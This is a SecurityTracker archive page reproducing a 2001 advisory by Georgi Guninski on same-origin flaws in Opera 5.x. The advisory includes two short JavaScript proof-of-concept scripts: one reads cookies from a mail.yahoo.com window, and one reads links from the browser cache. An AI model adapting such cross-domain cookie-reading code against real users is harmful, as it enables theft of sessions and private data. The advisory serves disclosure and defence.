SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Web Browser)  >   Opera Vendors:   Opera Software
Opera Web Browser May Disclose Web Pages, Cookies, and Links from a Separate Domain to a Remote Server Running Malicious Javascript Code
SecurityTracker Alert ID:  1002759
SecurityTracker URL:  http://securitytracker.com/id/1002759
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Nov 15 2001
Impact:   Disclosure of system information, Disclosure of user information
Exploit Included:  Yes  
Version(s): Opera 5.12/Windows, Opera 5.0/Linux; other versions may be affected
Description:   Georgi Guninski reported several vulnerabilities in the Opera web browser. Malicious javascript can access pages that the user can view, as well as the user's cookies and links.

A remote user can place malicious javascript in a web page that, when accessed by the target user, will be able to access web pages in a different domain that the user can view (pages that may have otherwise required authentication). The javascript may also access the target user's cookies and links from arbitrary domains.

The browser reportedly also allows malicious javascript to access the links in the user's cache and history.

Some demonstration exploit code is included in the Source Message.

Impact:   A remote user can create malicious javascript in a web page that, when accessed by the target user, will allow the javascript to access content, cookies, and links on behalf of the target user.
Solution:   No solution was available at the time of this entry. The author of the report recommends disabling Javascript on the Opera browser.
Vendor URL:  www.opera.com/ (Links to External Site)
Cause:   Access control error
Underlying OS:  Linux (Any), Windows (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
(A User Provides Additional Details) Re: Opera Web Browser May Disclose Web Pages, Cookies, and Links from a Separate Domain to a Remote Server Running Malicious Javascript Code
A user has provided additional exploit details.



 Source Message Contents

Subject:  Several javascript vulnerabilities in Opera


Georgi Guninski security advisory #51, 2001

Several javascript vulnerabilities in Opera

Systems affected:
Opera 5.12/Windows, Opera 5.0/Linux - probably other versions

Risk: Medium
Date: 15 November 2001

Legal Notice:
This Advisory is Copyright (c) 2001 Georgi Guninski.
You may distribute it unmodified.
You may not modify it and distribute it or distribute parts
of it without the author's written permission.

Disclaimer:
The information in this advisory is believed to be true based on
experiments though it may be false.
The opinions expressed in this advisory and program are my own and
not of any company. The usual standard disclaimer applies,
especially the fact that Georgi Guninski is not liable for any damages
caused by direct or  indirect use of the information or functionality
provided by this advisory or program. Georgi Guninski bears no
responsibility for content or misuse of this advisory or program or
any derivatives thereof.

Anouncement:
I am looking for contracts in the security area - check http://www.guninski.com

Description:
Opera is a multiplatform web browser.
There are several javascript vulnerabilities in it, basically allowing
script in a page to access a page and its properties in another domain -
AFAIK Netscape call this "Same Origin Vulnerability". 
It is possible a script in web page to access at least cookies and links
in arbitrary domains to which the user has access.
It is also possible a script to read the the links in the user's cache and 
history which at least have privacy implications if not more.
In some cases cookies and links in the cahe/history may containg sensitive information
such as usernames/passwords etc.


Details:
Examine the following scripts:
-1.----------------------------------
a=window.open("http://mail.yahoo.com");
function f()
{
xx=a.document.cookie;
alert("hi"+xx);
a.document.open();
a.document.write("<h1>aa</h1><script>x=window.open('http://mail.yahoo.com');setTimeout('z=x.document.cookie;alert(z);',5000)</"+"script>");
a.document.close();
}
setTimeout("f()",5000);
-----------------------------------

-2.--------------------------------
a=window.open("about:cache");
function f()
{
xx=a.document.links[2];
alert("hi="+xx);
}
setTimeout("f()",5000);
-----------------------------------

In addiotion the HotJava explot at http://www.guninski.com/hotjava1-desc.html works as
Jay@InfoAve.net pointed out.

Workaround:
Disable javascript (Opera suggest enabling "Use cookies to trace password protected documents")

Vendor status:
The vendor was notified on 5 November 2001 and was asked whether a fix shall be issued and when.
The reply was:
------------------------------------
You should be able to resolve the cookie issue by enabling "Use cookies to trace password protected documents", 
which means that pages with password protection aren't cached, cookies aren't stored, 
the URL shouldn't be displayed in History, etc. 
This is a "paranoia" option, and makes a few pages unusable.
As you are probably aware, many web technologies aren't very secure, 
but it is inconvenient for the user to block these. 
This is why the user should be given a choice to block privacy related information.
------------------------------------

Regards,
Georgi Guninski
http://www.guninski.com

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC